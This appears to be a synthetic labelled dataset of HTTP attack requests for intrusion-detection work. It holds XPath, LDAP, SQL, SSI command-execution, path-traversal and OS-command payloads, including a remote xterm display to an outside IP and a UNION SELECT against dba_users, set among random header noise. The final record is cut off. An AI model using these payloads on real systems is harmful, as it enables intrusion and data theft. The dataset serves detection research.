Start - Id: 48769
class: XPathInjection
GET /lqlehaRus4/wREtSesTncl9tln/nI/u8ti8/L@AHchild/r0nJdq.9T/ne/g4c6cHsWen/stdinTc1copydi7Ntvg/kLk52NL3lKbqj/1huhzroseeaTuaa/oKuv_P2PxUjA.cfm?sMcu3tdDhes=reesEh&aOfJ1N=140&en3ifiGgite=37881+++or+++1%3C+++1arn%2FdtXu%2Fs%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D+++or++++32%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&mw0i2boofe=dmeo0rdtT&h4noFrlrue0gee=241294911&ZMsT=8123606893&be4htes=soumPsp HTTP/1.1
Host: www.3afie.st:412
Connection: dasq17e
Accept: */*
Accept-Charset: iso-8859-6, x-mac-arabic, utf-8
Accept-Encoding: 
Accept-Language: oelcTs-oasEif, i9sN-as
Cache-Control: min-fresh=28
Client-ip: 232.245.220.245
Cookie: zed=140547;TITexec=183;Z1opty6=oi4kMawhrynyi;iikBitt=eiE n;iqowowtseLsrd=3129419115
Cookie2: $Version="80"
Date: Wed, 28 Oct 09 15:16:37 CET
ETag: "JPkHbt63LZW@TgBTvjUE"
Expect: 100-continue
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Tue, 01 Feb 05 02:03:34 GMT
If-Unmodified-Since: Fri, 19 Mar 04 08:16:29 UTC
If-Match: *
If-None-Match: "NXcWJm3vnSdIGNZ8"
If-Range: Sun, 05 Apr 09 24:39:05 UTC
Max-Forwards: 1
MIME-Version: 1.8
Pragma: a7raot='8nrwBMl'
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: Basic cElhbDplZWljMUVl
Range: -333764,-7
Referer: /tt1u6d/icet3l/WpeR/iaienis4/ckelra.dll
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/3.3 (Machintosh; U; PPC 0.6; eb-0d; rv:1.0.8) Gecko/60049707
UA-CPU: MIPS
UA-Disp: 924,263,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0640x829
Via: 3.9 www.edesotms.tiff:1, 3.4 201.178.12.215:8619, nntpp/4.8 www.ltTci.jpg
Transfer-Encoding: gzip
Upgrade: neds/2.0, 5aphe/6.1, hee/8.3
Warning: 526 136.169.175.214 "laeisnhoreecfefnrs" 
X-Forwarded-For: 98.154.59.21
X-Serial-Number: 265535777881770929
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48769
Start - Id: 43385
class: OsCommanding
GET /dcNF_symcnzynma/en46/tQrU2n/o10jR86coK.sDGjMe3/twctuzHOmUxDc83tZ/tnecipd8ui07mi/zd7sivKoaoupeCwcwoT/utqeeanwt6/rW6AxaZ_QzojMfF/Gb.jpeg?b7jere8IrzeN=00&eaRyeOsrl=hhtaccesi%3Ai+3srS3tr&asiens1xsbu3G=w%40ibh%3Dswt&xrasitjusr=Tm+o&wigni0ah=%5Crxterm+-display++213.152.153.76%3A0.0 HTTP/1.1
Host: www.dahenhi.com:6
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp, x-mac-korean, iso-8859-1
Accept-Encoding: identity, deflate;q=0.1, identity;q=0.8, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 218.45.110.121
Cookie: @B1OFPmeHDH=2;coA4sEtfnsorlr=itnmetant(<;witqb
Cookie2: $Version="6"
Date: Mon, 03 Sep 07 14:37:45 UTC
ETag: W/"oThLttcItnH6jh1_m"
Expect: a2s3toh=auieoceh
From: no4b@rasantepan.ch
If-Modified-Since: Sun, 13 Jan 08 04:12:33 CET
If-Unmodified-Since: Mon, 17 Aug 09 06:44:39 GMT
If-Match: "J6Tl_jXgltnfTMX"
If-None-Match: *
If-Range: Tue, 01 Apr 08 05:25:46 GMT
Max-Forwards: 18
MIME-Version: 1.8
Pragma: lv0e='6dil'
Proxy-Authorization: Basic OGlldnM6aW5vdA==
Authorization: NTLM aUFhdDRtc2Z1dWVjdGhldW8zZWFlZWwzb3NTYmNkdWxlbkQ1YW90cm5xdEw5aG9h
Range: 621700-,905114-
Referer: /Eele.sh
TE: deflate,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.9 (Windows; U; Windows NT 3.4; ip-Cy; rv:7.9.5) Gecko/23635036
UA-CPU: PowerPC
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9788x122
Via: 5.5 www.8ramrcoN.png, 1eme/7.4 57.108.71.68
Transfer-Encoding: identity
Upgrade: ehie/7.0, fyH/5.8, phx/0.7, t9e/1.5, u9Dar/1.3
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 68319129
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43385
Start - Id: 38156
class: LdapInjection
GET /ea@l/tOnimc/yf4s-cmdh/e7Ag2mql9.jpeg?uOh=sDSQwW38&ot=rop&alUeeg5t=ztexlw6tiweD&0erZfco6tro0=capassthruret%26ttaibnchild&iw=6006189&s1=hece%29%28%26%28objectClass++++%3Dgte*%29&bakOZ7Px=6eaaoe&extitl=08222649&imghaEnu16=76275&dmdItmmnefhe=tJEuj&zvQs=8239422&53e7agsOhnie=826582&oilsdr9t=dhY. HTTP/1.1
Host: www.cEitrihTr.ch
Connection: close
Accept: */*
Accept-Charset: cp-950, iso-8859-15, iso-2022-kr, cp-936
Accept-Encoding: compress, compress;q=0.3, gzip;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 137.189.157.34
Cookie: ceds=nzCoq;oh5irdt35ln5um=trst;7aser2=ee%u7a;zoTxzdmedpEr=7976849487;fkioa1acqsk2toS=c<croimeTh
Cookie2: $Version="2"
Date: Tue, 18 Nov 08 06:44:51 UTC
ETag: "A1s@88r@tyXJ610"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Fri, 12 Aug 05 18:12:43 UTC
If-Unmodified-Since: Sat, 31 Jan 09 14:48:21 CET
If-Match: "IRWVsObenByGIye0hs8"
If-None-Match: *
If-Range: "_SLZ.-3l2kkJnkC"
Max-Forwards: 7
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: njtdo oiaHAsOe=InaIstei
Range: 6-624,5616-9,-29
Referer: http://3st2is.st/ahdbE4/zgfu/thoost.exe
TE: gzip,gzip;q=0.4
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.7 (X11; U; Linux i586 8.8; tx-sh; rv:1.5.3) Gecko/09270008
UA-CPU: StrongARM
UA-Disp: 311,524,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9560x3335
Via: 1.6 116.31.74.204:8175, 5.7 185.107.59.153
Transfer-Encoding: deflate
Upgrade: eeu/8.8, fSe7/3.7, nho/6.1, rqw/6.3, SLsti/8.0
Warning: 967 www.teLieti.js "bUr2" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38156
Start - Id: 39110
class: LdapInjection
POST /8WvHZW3f4TMgxH_/sitdtOffnshyUettq/WO2lInQSFF0havingstD/NpasswdV/yFN1Dnetcate.ex/eznwwX/bNAIBwJHWY8r/sczIBA9NbTtYk/VHoIs7EGKxp_/55SmNm79T@dpe-L/tqU323c.jpeg? HTTP/1.0
Content-Length: 203
Content-Language: 2i,f9o
Content-Encoding: gzip
Content-Location: http://eybe.com/tOginn/niZW/zmgtRnh.mdb
Content-MD5: bmM1bG5pbjJycm9hdDIzbA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 Aug 09 04:15:08 GMT
Last-Modified: Mon, 21 Feb 05 17:25:49 CET
Host: 31.170.40.222
Connection: close
Accept: text/xml;q=0.6, application/rtf;q=0.7, image/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: iehna-iweeck, laroon-vo;q=0.4, bh-atm;q=0.0, gailv-9szsl;q=0.0
Cache-Control: only-if-cached
Client-ip: 33.150.26.77
Cookie: 0epslth8i=o_GYCquRtfFz;DBZ7ncZOSt= tndmni8;ngEs=) (|   ( cn=*o  'brien* )(mail    =*o    'brien*  )  ;eytpa=TjnpQetnhcDeG4;eagykub=TXnull]likeiaJ
Cookie2: $Version="9"
Date: Mon, 21 Aug 06 19:47:42 UTC
ETag: "k3m6jiywwKsbXAam1tqa"
Expect: 100-continue
From: raspuv@ntperaoi0.com
If-Modified-Since: Sat, 30 Jan 10 09:11:01 GMT
If-Unmodified-Since: Fri, 03 Apr 09 20:38:30 UTC
If-Match: *
If-None-Match: "@K.T_KU2UZXMaAE0"
If-Range: *
Max-Forwards: 0
MIME-Version: 4.0
Pragma: sng0ye=hSee8
Proxy-Authorization: Basic MGFQbzNoOmVzWHRkZXc=
Authorization: NTLM ZW9obHJob2R4ZTRNRXdudGxDZnM2Q2VhZ0VwZk1kb203aUVzZQ==
Range: 436794-224,783-23111,-50
Referer: /tidst/Cmpmto/mixsia/lpadnM.css
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/0.9 (X11; U; Solaris 6.4; dy-lu; rv:0.2.8) Gecko/91993630
UA-CPU: StrongARM
UA-Disp: 560,8343,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7309x3114
Via: HTTP/1.6 www.eEcIot.js, 7.6 www.eostak.tiff
Transfer-Encoding: gzip
Upgrade: lbe/6.4, zcih6/7.6, esl7m/3.8, 3neS/7.1
Warning: 090 www.daarr.html "tlodnt" 
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

nototpsfd=deleteCn&a2trserdDSnec=ejS9sti_&thegrouwo=jhklt&hsedeagertaroo=pf&2foaAhid=5744526&Mth6hoc=10088167&h0=41508833&ejxNm63d=oscupE&siSnmsmoMer=800025&iSncUpfj1BEI=darhcsiaa2r2scs&riereratet8go=661

End - Id: 39110
Start - Id: 50047
class: XPathInjection
POST /hotdekltascs/d-N/tettr8etRktst/z9minput4EqR35/bddi-ExtTk/sock_stream@K8fvar2Ye8aj/a5H9nxlsperlJblike1Q/Y3htaccesJuaWTe-sx/oInehcee0snn7idtret/cotthcheeee/e3.exe? HTTP/1.0
Content-Length: 96
Content-Language: g
Content-Encoding: deflate
Content-Location: /e1uFuen/slls/iublaG/dgen/e3eeM.shtml
Content-MD5: VW5laGVyc3N5aUl2aXNiZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Sep 04 11:46:48 CET
Last-Modified: Sun, 10 Sep 06 09:19:58 GMT
Host: www.su7d.be
Connection: close
Accept: application/*;q=0.0, application/*, video/mpeg
Accept-Charset: cp-936, x-mac-arabic;q=0.3
Accept-Encoding: deflate;q=0.5, deflate
Accept-Language: ehhcfd-7;q=0.9
Cache-Control: e='rera4'
Client-ip: 156.140.221.238
Cookie: ombntDOtht=hOs 6;7wLrmsliSemt=hLttina']  |  P    |   //user[  name/text(  )   =  'au;wzyAdrewshiyko=hru;qkDsystem=191040658;gRlnhlhwi=w;rs9ejVi2=48
Cookie2: $Version="33"
Date: Sun, 15 Jun 08 23:08:22 GMT
ETag: W/"AIvtFc_W-7aHz.bg-93"
Expect: ziee=5mom;eeregi=eeeeil
From: rffjOIp@Tenah9e.be
If-Modified-Since: Sun, 10 Aug 08 23:24:54 CET
If-Unmodified-Since: Sun, 07 Mar 10 10:33:28 CET
If-Match: "OfcionNl9Pqbo8Jy."
If-None-Match: "FYwdNIAp3x0x3T4IPDt6"
If-Range: "LLXM.Zdfkl5-EDi"
Max-Forwards: 2850
Pragma: no-cache
Proxy-Authorization: csynl badcbq=TEwoiaqQ
Authorization: Digest opaque="taIbtteu"
Range: -59071,-7
Referer: /zpyh/icyaqta/ongei/3Vgi.htm
TE: trailers,gzip,chunked;q=0.5
User-Agent: Mozilla/1.9 (Windows; U; Win 9x 1.9; 0m-Oy; rv:6.6.2) Gecko/64881710
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color32
Via: FTP/6.9 205.192.20.83
Transfer-Encoding: deflate
Upgrade: el5/5.9, toaEci/6.4, n64go3/0.8, nk1/2.4, emi/6.4
Warning: 331 133.140.170.207 "tenopilr" "Fri, 29 Jul 05 19:30:07 GMT"
X-Serial-Number: 4431106659344342
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nlmbmpea=eSddetgeciimsibn&aiftr=39&mst=1178800491&hsf1mOEohS=kl6ounb3bs1k2e&uebtci=us0rqennDrefi

End - Id: 50047
Start - Id: 36890
class: LdapInjection
GET /aKdNFrwg3/nBdttln/rJbsyUwtV7gL05HUIU/IrE/libeCAs/wUa5astylep/j._MhnXoQC.ZWm.pl?ooeh=MA%7Eedbe9e+psq%3C&lferi8eGetlg=ae&yg@jecatTgYwhere=84166788&ntipsrog6t81n=hBo247avdN%27s%25baiG&tffsoigi6erlakq=lcu6aa&kgesmaP=tEWzPtO&uaivyTdht=87246878&nreil7tyeesJ=rsEig&1tch=dt2i2heEeiono&cckc6nds8=oOhuei+asct&XdeXniT=o&6WWZ=u%25rqeeimginpute&eowtpmrxCzzL1gr=iAgeHGlmO5%40&y_ftinsert2P=183759507&sAdpeoyo=1908595 HTTP/1.0
Host: www.e4tqpcn4ae.cz
Connection: hE8t
Accept: video/*, audio/*;q=0.6, video/quicktime;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: T-n, n-ILivUts6, hTaes-st;q=0.9, m-m1;q=0.9
Cache-Control: no-cache
Cookie: dnigeijixcrre=6d;5jhikgyeueuaeon=")(targetfilter=(o=NetscapeRoot));wyhjd66tSd=glsftvi0etm;gzxr5i7deO5p=wd6lo
Date: Wed, 02 Nov 05 10:09:08 CET
ETag: "5V5V3ceiXA_IzKT"
Expect: hda4oss=sytee
If-Modified-Since: Wed, 10 Mar 04 20:34:18 GMT
If-Unmodified-Since: Sat, 13 May 06 04:44:22 UTC
If-Match: "Ofd6UR1IJt@@VOC"
If-None-Match: "wueN4JA3T4GYj2N178"
If-Range: Wed, 09 Dec 09 19:28:58 GMT
Max-Forwards: 100
Pragma: ons8oBh='u'
Authorization: NTLM eW5lbm5VM215cmhobWVkbmV0bzBpYWVlaGZpeWNuaWg5dXV0b1RlM005aXM=
Range: 158-39,21618-
Referer: /mnlcscyS/dlIUb/lcaubrez/ztmpo/ybiuhndr.php
User-Agent: 5a8uid5/3.2.3.8.2
UA-CPU: Sparc
UA-Color: color8
Via: FTP/9.8 58.236.130.117, 0.3 www.07eb.jpg
Transfer-Encoding: identity
----: -------------------

null

End - Id: 36890
Start - Id: 38137
class: LdapInjection
GET /qsosehtoaauXrmw2e/Usg.htm?1TphdpiestvReh=%29+++%28++++%7C++++%28displayName%3Dhad*%29++%28name%3D+++had*++%29%28++mail%3Dhad*%29&ytirsdblxmsrXt=51&5hefcT=svoocf4nsaa4EBmh2&aIreethaneLuy=8&enrolctuytL=0i&tihsaOtias8tt=e&hftkmdeitec=%27+havingcrsynod7stdinei7htred&9oc5lcokhlyNC=nN&etstdsn19SzAcde=nts+5&n4num4o8grn=3609186 HTTP/1.1
Host: www.ttrhvrsbLJ.uk
Connection: close
Accept: */*
Accept-Charset: isiri-3342, x-mac-cyrillic;q=0.0, shift_jis;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 255.68.111.185
Cookie: iabaaag=aaew;2le=9500322088;.b90z1jA=6l7passwdeb;5ttanfeEhtaet87=66440;Goza=2
Cookie2: $Version="23"
Date: Sat, 22 Sep 07 01:59:09 UTC
ETag: W/"E9eWP5kbo7V4.VA00kBy"
Expect: 100-continue
From: ttste@rra4euq0.de
If-Modified-Since: Tue, 06 Oct 09 06:05:16 GMT
If-Unmodified-Since: Sat, 20 Dec 08 01:21:46 CET
If-Match: "CnOKubaYehQ48nND5sG"
If-None-Match: *
If-Range: *
Max-Forwards: 8294
MIME-Version: 1.0
Pragma: lOe3=bwe
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: NTLM aE83aW9tbnowaWhpN2VFc291ZWt5d0FnT29zbGloc2k0WmVx
Range: -49,90-,6-
Referer: /Rh8iicc/gbSenml/rrr4ae/eihgei/pnndtc.html
TE: chunked,trailers
Trailer: From
User-Agent: Mozilla/8.0 (compatible; aensyt; Win98; Nerd; citoo)
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2471x139
Via: 6.3 www.Sejelz.htm:4
Transfer-Encoding: deflate
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 953 www.rhr1crat.jpeg "ndt4er0lwh7ihen2iO" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38137
Start - Id: 39057
class: LdapInjection
PUT /orbeRmTnNyoet2urere/toR/aUJ/G_YhavingmGAunallinsertI/oqWiOdAUmqD/toaNpriVo4yamfiTnene/uniqdp6o/oJ.jsp? HTTP/1.0
Content-Length: 305
Content-Language: yi9nntEv
Content-Encoding: deflate
Content-Location: /o5mUtiur.mspx
Content-MD5: c2hyYzVndDBzaWZtY3JoOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Mar 09 12:16:43 CET
Last-Modified: Thu, 04 May 06 13:18:14 UTC
Host: 54.120.103.87
Connection: close
Accept: audio/*, application/postscript;q=0.0, text/*;q=0.9
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 48.137.231.218
Cookie: 5hks=)na 2eaaelhrmra/On;4v=)  (| (displayName=had*)   (name    =  had*  )(mail=had* );gva0yn=778797542;GetccWsodc.=834510
Cookie2: $Version="914"
Date: Mon, 02 Jul 07 07:46:53 UTC
ETag: W/"_hOflZ-70QRXkuOrXJk."
Expect: ioeEtOf=oeptsgda;akE0hprt
If-Modified-Since: Tue, 15 Aug 06 19:30:37 UTC
If-Unmodified-Since: Fri, 07 Dec 07 08:20:58 CET
If-Match: "4OG8Q9qRLHexsEo"
If-None-Match: "pHzDYZ4SPjdwvHMI1"
If-Range: *
Max-Forwards: 4
MIME-Version: 8.9
Pragma: t=nebpt
Authorization: Basic aHlyZWxyc3I6Y3dubnQ=
Range: 2-
Referer: /htjW1Sw/lenengr/ohotho.jpeg
Trailer: Accept-Language
User-Agent: Mozilla/0.5 (Windows; U; Windows NT 3.7; es-gi; rv:5.5.5) Gecko/38079766
UA-OS: Mac OS X
UA-Pixels: 7144x0015
Transfer-Encoding: compress
Upgrade: gPce2/7.1, oera/8.7, plyti5/7.4, 84fe/7.1
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

F@b8inputoptRallbF=rse&gaeonrnshyss2=zs&lLPqOuutSw3=eAtEineWn&A7@6betweenEHYQyKx=344051698&uelelmSgy=658&ehchmshiis=ipee8bgsoundsdaaooe&dReerTref1cgt7t=8266620140&ctasZwi=7&shxUAr=kQYmvG3jHS&jiitStsrg=54709&hetc2tlogqPadminq4access_logz=y&98fperlz-s4nalle=leqneq5&otabnzbiT=587299&aoswipAxteotutc=acTtd7da

End - Id: 39057
Start - Id: 48296
class: XPathInjection
GET /eiy.asp?XuRPe=Rtmsr&ph5dd=u0h1otperlSe&sex2tp=input0d02&ve6tha=R+ea%29&tkatx0sddw=nel%7EhtoN HTTP/1.0
Host: 65.77.230.139:638
Connection: keep-alive
Accept: application/x-tar;q=0.7, audio/x-wav, audio/x-wav;q=0.9
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.0, gzip;q=0.7
Accept-Language: yve']    | P  |     //user[     name/text(   )  = 'stsmk
Cache-Control: s='Hleyj'
Cookie2: $Version="2"
Date: Tue, 01 Jan 08 05:10:37 CET
Expect: 100-continue
From: q9erhj@rCea.net
If-Modified-Since: Sun, 06 May 07 07:56:25 UTC
If-Unmodified-Since: Mon, 02 Jul 07 10:53:27 CET
If-Match: *
If-Range: *
MIME-Version: 6.0
Authorization: Basic aXRldWV1Mjp0cm5h
Referer: /3zycsah/mmtwiiF/8Veaw/letant/dy9nufoi.php
TE: deflate;q=0.1,trailers,trailers
Trailer: Max-Forwards
User-Agent: n7Nih/0.5.0.0
UA-Disp: 5131,820,16
UA-Pixels: 7350x333
Via: 6.4 81.67.164.121, 1.9 www.ileiE6.css, 5.3 www.iodlLmba.shtml
Transfer-Encoding: gzip
Upgrade: ktlatf/2.6, dtr/7.2
Warning: 917 209.120.191.237 "rpaWttoyTfGs" "Mon, 30 May 05 05:56:19 GMT"
X-Forwarded-For: 122.89.87.216
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48296
Start - Id: 39889
class: SSI
GET /AzYnph-J2echo4Rn/esIi83.tsvoj4J/oqtiEzhrns7vye/emiWNr4QLJSv/tS2BSVgf_b8CcE/o_NrsrkiXSIV/tpoehIinPxthni7z/17iEMstdinx38selectFIsock_stream/easHkT3.bin?o1Hh4tOccuiar6e=hoxKJVV&ridristcia=mwotwp5le93n8&awifu=746&tk=nr&nhtn3tiEbc=e++yn1N&tvteinto=0&uitUd1laliuq1=behbiimewr&Eryrhtoa=gdn&oewat9n=ufifaIitsrobb26hh HTTP/1.1
Host: www.isoh1.fr:9382
Connection: mitikiiv
Accept: */*;q=0.2
Accept-Charset: koi8, iso-2022-jp, x-mac-ce, windows-874
Accept-Encoding: *
Accept-Language: dtt-lrisw56t;q=0.4, lt-wro6, beefyn-7, hc-eiinot9, oet-s;q=0.0
Cache-Control: no-store
Client-ip: 105.13.153.124
Cookie: LzlJz9dINND=<!--     #exec  cmd="/bin/ls    -l     /home/nHepas/0Siyfe5"   -->;rysmoiype=815;-4QO..UM=i?;oham4N=o0rg-gM;K9GTVfKftpbrm=2146332;notdnS7Otnmprer=a<c<u
Cookie2: $Version="1"
Date: Sat, 28 Feb 04 08:02:18 GMT
If-Unmodified-Since: Thu, 04 May 06 05:54:43 UTC
If-Range: Sat, 24 Mar 07 06:16:33 GMT
Max-Forwards: 2526
Pragma: ne6Nexr='euket9Ba'
Authorization: Basic b2FuczpweTFzVG5l
Referer: /tnrOrwof/hltBHn.nsf
Trailer: From
User-Agent: Mozilla/0.5 (compatible; MSIE 0.4; Win98; rrpcj)
UA-CPU: x86
UA-OS: Windows 98
Via: yaiee/9.8 109.191.67.14, 3.1 www.gphhnhzt.jpg:10, 4.1 www.asn3.js:9666
X-Forwarded-For: 76.173.233.161

null

End - Id: 39889
Start - Id: 45351
class: PathTransversal
POST /Q4yqqTpwxgroup bywG/mDES-/rJt6K.EbhVvOT/v854.2ARE_OZUe/nttoNccp9et/htbd6ed7sh/izknedp2Et.bin? HTTP/1.0
Content-Length: 348
Content-Language: 6zc
Content-Encoding: compress
Content-MD5: c25naWFmZmVpbmVlZGFuYQ==
Content-Type: application/x-www-form-urlencoded
Host: www.mtsUc.de
Connection: osaceesw
Accept: text/xml;q=0.6, image/gif
Accept-Charset: iso-8859-2, x-mac-chinesesimp, windows-1255;q=0.8, big5;q=0.1, iso-8859-1
Accept-Encoding: 
Client-ip: 33.56.211.184
Date: Sat, 20 Oct 07 23:29:03 UTC
If-Modified-Since: Sat, 26 Apr 08 20:12:25 GMT
Proxy-Authorization: NTLM OWl0bmdqbmhuZTZNbmllYnJUS1NlZTBvbW5yaXJvRWFpZ2VlaGUxZURzYWd4
Referer: /rmaaeNbn/ejenboe.msf
User-Agent: Mozilla/0.9 (X11; U; Unix 4.1; e8-ie; rv:2.2.2) Gecko/82909943

aonost6T4kta=9220&ttbienua0uo=a%+bodyh-a]h&sncscb4tqHeeu=9764&eo=jhTciy&Bpds=878257703&Ydsii1igp=bina&hohnatnx=C~ss&anadah3rr=c4fn59esyotn5heew&uYodPoBaaae=/../../../../../../../Inetpub/iissamples/ng/erlaon/tearanor/tiet.php&hrbbe26=7&0iMIOinputY=381083050&BzhCb=~ds&XtLfhmdsb=tre8epSrshd&9zneSneosoa=325&tEbsa=b

End - Id: 45351
Start - Id: 41133
class: SqlInjection
GET /cdss9uiNbhir9putoDu/cBjtxYssdiNsg3Yetat/eYYEzPiVc/q_.iNv.php3?eogp0Lfl4fl=bulk++insert++++od+++from+++++%27pwdump.exe%27++++++with++%28codepage%3D%27RAW%27++%29&esonRewtqnidqi=hEPFQ HTTP/1.1
Host: 61.99.92.241:80
Connection: izvisTne
Accept: text/xml, video/quicktime;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 225.169.58.33
Cookie: gNhCqt2divshutdownVDO=ne5eaia5is6ricyr;tfssdniewbeg=ees(g eval/r;zyF1sm1J7=reelA\n;tu=Mre;lhRmm=sS84pn;b5b0TUat=gnxAOJrt8
Cookie2: $Version="318"
Date: Mon, 25 Oct 04 16:24:51 GMT
ETag: W/"VyKWI0nTnYyfdWi-YLN"
Expect: mauisrt=tgnoooe
From: r3rduu0D@aEtfemeowc.cz
If-Modified-Since: Tue, 03 Aug 04 04:53:38 GMT
If-Unmodified-Since: Fri, 09 Apr 10 04:41:13 CET
If-Match: *
If-None-Match: "Umuw6txFznxqG5S"
If-Range: Sun, 02 Nov 08 07:54:09 UTC
Max-Forwards: 6451
MIME-Version: 9.5
Pragma: tb1etra='teGtMR'
Proxy-Authorization: odibel 3arthngL=ngnhea
Authorization: iKoea hinaasI=nuum6mc
Range: -846772,-7313
Referer: http://www.3boet.ch/enhNpyud/ei8r7Sv/eeqoOOe/wHSfthhn.bin
TE: gzip;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.6 (Machintosh; U; Mac OS X 5.3; qs-tn; rv:7.3.4) Gecko/71712719
UA-CPU: 68000
UA-Disp: 152,2965,32
Via: dap0m/8.9 www.Aiarrhda.shtml:26
Transfer-Encoding: deflate
Upgrade: is65/4.0, tshy/4.7
Warning: 198 130.0.9.220:076 "si9M9yfcee" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 067866355817969470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41133
Start - Id: 40738
class: SSI
GET /dEN/CCJsQl5gM.Q/seeCrdxatlz/6LQA/zwrRLDmochavS@T.R/qa6nlndeai1yer5Eso/6v/CDMwEXAAb5Q/bodyEr4nJKmE/1SuK3VB5f_m/aVqaO@Lo/vlnEd5krNg.mdb?NwBOxWtelnet=2ahtpass7n+Ipsthfhinon&qlTmarxg=14&nei=ekeveqeei0ssi9r&zmjb=oJG-B7Mj&aquOFzQaccept7t=b%3Ao%24tg&oeelpaaR=99228&4aCG5b7=tXrfuOs8W990 HTTP/1.0
Host: 207.19.104.190
Connection: keep-alive
Accept: audio/*;q=0.2
Accept-Charset: x-mac-arabic, x-mac-greek, windows-874;q=0.2
Accept-Encoding: *
Accept-Language: ru-iea9sEy;q=0.4, eoh3aauq-naoror;q=0.8
Cache-Control: min-fresh=69
Client-ip: 86.79.186.5
Cookie: acaje5dN9=rep;kSy9u=<!-- #odbc  connect="bglia,tzhs6a,6ueY0"     statement="select *  from   w"-->
Cookie2: $Version="5"
Date: Sat, 24 Jun 06 09:10:09 CET
ETag: "QMHDef5q-SVB5UcSGNFu"
Expect: 100-continue
From: aylssS@ere1eoooT7.net
If-Modified-Since: Sat, 19 Apr 08 13:35:03 UTC
If-Unmodified-Since: Sun, 06 Jun 04 02:42:40 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 30 Aug 09 02:50:27 CET
Max-Forwards: 262
Pragma: gsn4ttf=tjRsllit
Proxy-Authorization: Basic ZW5mc3d1aDM6dHJjUw==
Authorization: 1oean btfe=e3ye4ee
Referer: /satoei/rmNihRis.cfm
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: j_2AL@ http://www.AttpL.net
Transfer-Encoding: deflate
Upgrade: atz/8.8, daes/7.7
Warning: 297 www.ceeC.gif:0707 "esraeaiasfeTdpF6mae" "Thu, 27 Dec 07 02:48:25 UTC"
X-Serial-Number: 2754649417
----: -----------------------------------------

null

End - Id: 40738
Start - Id: 42311
class: SqlInjection
GET /s9oKWZBqX2K8E8T30nD/ge/9e3masin/o0tf0oddvo8i/ileegoaahnnziepea3/stMNeW3V919/lP9pPU7nZRBGN51Iib/dssimarxex/A9lcel2groKrslhao/s5Rlh8as5no2lntioely/fwjhqfRke.png?hx8passthruopaEV3kZ=vSule3n3meta4plux&hSsGhftrvyecWie=tha7loutgtmei9&p1he2heieeeXe=r4elo0rPanra8+ntft&chnrAuhrsm=ahlicln8l&n8OeOnNelTt8ss=ta&ste0ttsemtodlx=rsl%27++++UNION+++%2F**%2F+++SELECT+tyuheaq3+++++FROM++dba_users++WHERE++euaUtc+++like+++%27%2525&xp_Q5YsHnocatko=lwtlobalosqs2su&n3iJmngBjWP=es-b4&i3mciaajdtsyCA=miNdidocemfeLs&VNwBc=a&5eI1o=7tynhxsi28Ie0pr&boay=i HTTP/1.1
Host: 107.123.188.240:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: big5;q=0.7, x-mac-korean, windows-1252;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 50.218.71.30
Cookie: pavf8ltz=01015221;le7haeg5hr=3;lo8=f 
Cookie2: $Version="134"
